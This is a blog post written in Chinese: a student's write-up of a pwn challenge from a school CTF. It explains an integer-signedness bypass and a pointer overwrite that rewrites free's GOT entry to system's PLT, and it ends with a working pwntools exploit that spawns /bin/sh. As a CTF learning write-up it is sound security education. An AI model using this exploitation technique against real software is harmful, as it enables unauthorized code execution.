Spirit校赛复盘

已于 2022-10-13 20:18:08 修改
阅读量189 收藏
点赞数
分类专栏: pwn 文章标签: 安全
于 2022-10-12 22:34:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sandyyyz/article/details/127291791
版权

前些天刚打了人生第一个校赛,小萌新对一题印象比较深刻,事后也想了很久才做出来。 

checksec一下发现开启了canary和 NX,拖到IDA64看一下

可以看到,第一次read正好可以从buf2起始位置向高位溢出覆盖ptr,并且存在二次读入ptr区的read,而后存在free(ptr)可以考虑修改free.got成system.plt,将/bin/sh写入ptr指向地址,就相当于free(ptr)-->system(/bin/sh)

由于只有当nbytes<=8才会执行我们想要的第二次read,而if语句中是int,read中是unsigned int,存在整数溢出,可以读入负数进入if语句达到我们read的效果,直接读入-999999

如何修改free.got呢?

第一次覆盖ptr栈帧
ptr-->free.got-offset(只要能读入一个字符串即可)(0x8)
(buf)   junk data
  (buf)      junk data

第一次修改ptr为指向free.got下方offset的指针

free.got

2(offset)
1

此时,ptr应该指向1与2之间的位置

下一步只需将2处覆盖为/bin/sh(总共长度为offset),再覆盖上方free.got为system.plt

system.plt
/bin/sh
1

 此时执行free(ptr)相当于system(/bin/sh),构造exp如下:

 1 from pwn import*
  2 sh = process('./pwn')
  3 context.log_level="debug"
  4 elf = ELF('./pwn')
  5 payload = b'a' * 0x10 + p64(elf.got['free'] - 0x10)
  6 #attach(sh)                                                                 
  7 sh.sendafter(b'name',payload)
  8 sh.sendafter(b'How long?',b'-99999999\x00')
  9 payload = b'/bin/sh'
 10 payload = payload.ljust(0x10,b'\x00')
 11 payload += p64(elf.plt['system'])
 12 sh.sendafter(b'What ??:',payload)
 13 sh.interactive()

Sandw1tchzs
关注
专栏目录
1105 Spiral Matrix 给定数组向螺旋矩阵中填入数据
行步至春深
08-24 237
要做的事情是,将数组按照非升序/降序,顺时针从外围到内部一圈一圈地把数据填到矩阵中,并打印出来。也就是将数组排好序后,将矩阵的坐标和数组的下标对应起来。 所以用一个这样的数组存放矩阵相应位置上元素的数组下标。 int mp[200][200] = {0}; 起先,我这样填充每一圈(注意交点的分配) 当然,从外到内,这个圈一定是在减小的,减小多少,我用z来控制,程序如下,4个for循环分别代表4条直线上的元素 int idx = n-1,i,j,z=1; int sw = false;.
【剑指紫金港】1105 Spiral Matrix 贪吃蛇算法
征服所有不服的博客
02-09 94
A 1105 Spiral Matrix 题目链接 Problem Description This time your job is to fill a sequence of N positive integers into a spiral matrix in non-increasing order. A spiral matrix is filled in from the first element at the upper-left corner, then move in a clockwi
59. Spiral Matrix II
weixin_49991368的博客
12-08 152
题目: Given a positive integern, generate ann x nmatrixfilled with elements from1ton2in spiral order. Example 1: Input: n = 3 Output: [[1,2,3],[8,9,4],[7,6,5]] Example 2: Input: n = 1 Output: [[1]] Constraints: 1 <= n <= 20 ...
CTF常见题型
citytwilight的博客
07-17 3455
CTF常见题型 CTF比赛通常包含的题目类型有七种,包括MISC、PPC、CRYPTO、PWN、REVERSE、WEB、STEGA。 1.MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。 2.PPC(Professionally Program Coder)类型,即编程类题目,题目涉及到编程算法,相比ACM较为容易。 3.CRYPTO(Cryptography)类型,即密码学,题目考察各种加解密技术,包括古典加密技术、现代加密技术甚至出题者自创加
House_Of_Spirit ctf oreo程序分析
weixin_30551963的博客
07-02 177
oreo程序下载 提取码:t4xx 程序分析 int __cdecl main() { leave_add = 0; leave_del = 0; leave_buf = (char *)&unk_804A2C0; ... ... menu(); return 0; } main函数中先赋值了三个全局变量,这三个变量在.bss段是连续的 在这个程序中,...
My Spirit | “顶级复盘
Mind and Hand
06-01 233
世界不会在意你的自尊, 人们看到的只是你的成就。 在你没有成就之前, 切勿过分强调自尊。 ——菲茨杰拉德《了不起的盖茨比》
Cocos spirit精灵的旋转
wakaka112233的博客
01-27 2089
官方文档介绍的旋转方法也是很多,像 RotateBy 等等,使用手册都可以查到,不再赘述。 但最近写小游戏时,想到另一个很简单的方法,分享给大家(博主新手,大牛勿喷)!   此方法用于精灵本身的旋转(旋转点在精灵自身内部即可) 1.首先确定以下理想的旋转点,通过更改Cocos属性检测器里的Anchor,默认时0.5,0.5   精灵中心,通过调节这个比例,可以修改spirit中心(即旋转...
爱智EdgerOS之Spirit 1深度使用体验与EdgerOS应用开发实践
热门推荐
╰つ栺尖篴夢ゞ
11-14 4万+
EdgerOS 是为万物互联时代而生的智能操作系统。为广大开发者提供基于互联网技术栈的操作系统平台,极大简化了物联网 App 开发难度,提高开发效率。通过爱智云,EdgerOS 为开发者提供了强大的云-边-端协同能力,开发者无需关心设备是本地还是远程连接,EdgerOS 能够无缝切换,给用户带来丝滑的使用感受,实现“多用户-多终端-多设备”的实时连接与互动。 EdgerOS 是下一代面向物联网和边缘计算的智能操作系统,可广泛应用于面向个人、家庭和行业的物联网产品和解决方案。
学校人事管理系统+spirit校园管理信息平台安装版 2.0
11-27
4. **家校互动**:提供家长与学校的沟通渠道,如消息通知、成绩查询、家长会等。 5. **校园安全**:监控校园安全状况,如进出管理、应急预案等,保障师生的安全。 2.0版本的升级可能带来了以下改进: 1. **用户...
SPIRIT家校互联平台 V2.0 SQL修正版 -ASP源码.zip
01-25
SPIRIT家校互联平台V2.0 SQL修正版是一个基于ASP技术开发的教育信息化解决方案,主要用于连接学校和家庭,促进双方的有效沟通。这个平台的SQL修正版可能针对早期版本的一些数据库相关问题进行了优化和修复,以提高...
Spirit-master_spirit_django_backendsystem_
09-28
【标题】"Spirit-master_spirit_django_backendsystem_" 指向的是一款基于 Django 框架构建的后台管理系统插件,名为 "Spirit"。这个插件专门设计用于提升和扩展 Django 应用程序的后台管理功能,提供了一个用户友好...
boost库spirit
10-09
### Boost库Spirit知识点详解 #### 一、Boost Spirit简介与背景 Boost Spirit 是Boost库中的一个组件,专注于提供一种简洁且高效的方式来定义和构建解析器。它基于泛型编程技术,利用C++模板机制实现了一个功能...
SPIRIT DSP宣布ARM已获得语音与音频软件许可
01-19
 2008年12月4日,语音与视频软件引擎提供商SPIRIT DSP(SPIRIT数字信号处理)宣布,ARM公司已选择SPIRIT的语音和音频软件来评估其下一代处理器的多媒体性能。  随着多媒体功能成为消费类电子设备的必备功能,...
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 758
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
注册安全分析报告:熊猫频道
Explinks的博客
09-10 536
熊猫频道作为央视的子频道, 采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “我们怎么会被盯上呢,不可能的”等等。有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。
第146天:内网安全-Web权限维持&各语言内存马&Servlet-api类&Spring类&Agent类
weixin_71529930的博客
09-10 997
然后访问http://ip/,这里会卡住,把之前创建的index文件会被删除,后面的页面是我访问的缓存,同时会产生一个.HH.php文件,这个文件是linux的隐藏文件,但是不知为何,我linux搭建的访问不了,只能这样演示。在我去删除的时候,他又会立刻去创建出来,甚至在我鼠标右键的时候因为这个文件不断地创建,右键页面也不能打开,从时间也可以看出来这个文件,在一直的刷新。后面换成了小迪视频里面的冰蝎版本,视频中问题是木马不能再Upload目录下,这里我试了也不行,所以这个还是有很多的bug的。
首个大模型供应链安全领域的国际标准,WDTA《大模型供应链安全要求》标准解读
银行信息系统应用架构导论
09-10 235
大模型供应链安全要求》标准通过提供供应链各个层面的安全管理要求,为组织构建更加安全的AI生态系统提供了明确的指导。这些模型在带来创新和便利的同时,也伴随着安全风险的增加。《大模型供应链安全要求》提出了大型语言模型(LLMs)的供应链安全保护框架,提出了管理LLMs开发、运营和维护(O&M)中涉及的供应链安全风险和供应活动的要求,并提供了常见的供应链安全风险和典型安全案例等相关信息。对供应商进行严格的选择和持续评估,确保其提供的产品和服务的真实性、完整性和准确性,并防止信息在供应链中被篡改或泄露。
Web3 项目安全手册
最新发布
2301_76786857的博客
09-10 302
现如今针对 Web3 项目的攻击手法层出不穷,且项目之间的交互也越发复杂,在各个项目之间的交互经常会引入新的安全问题,而大部分 Web3 项目研发团队普遍缺少的一线的安全攻防经验,并且在进行 Web3 项目研发的时候,重点关注的是项目整体的商业论证以及业务功能的实现,而没有更多的精力完成安全体系的建设。通常项目方团队为了确保 Web3 项目的安全会聘请优秀的区块链安全团队对其代码进行安全审计,但是区块链安全团队的审计仅仅是短期的引导,并不能让项目方团队建立属于自己的安全体系。
Spirit库:解析设计实例与实践应用
"Boost库中的Spirit模块是C++编程中一个强大的解析库,特别适用于处理语法解析和编译文法。Spirit提供了多种解析器类型,包括递归下降解析器和基于模板的解析技术,如STL风格的灵活设计。它在易懂性、灵活性和效率上...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值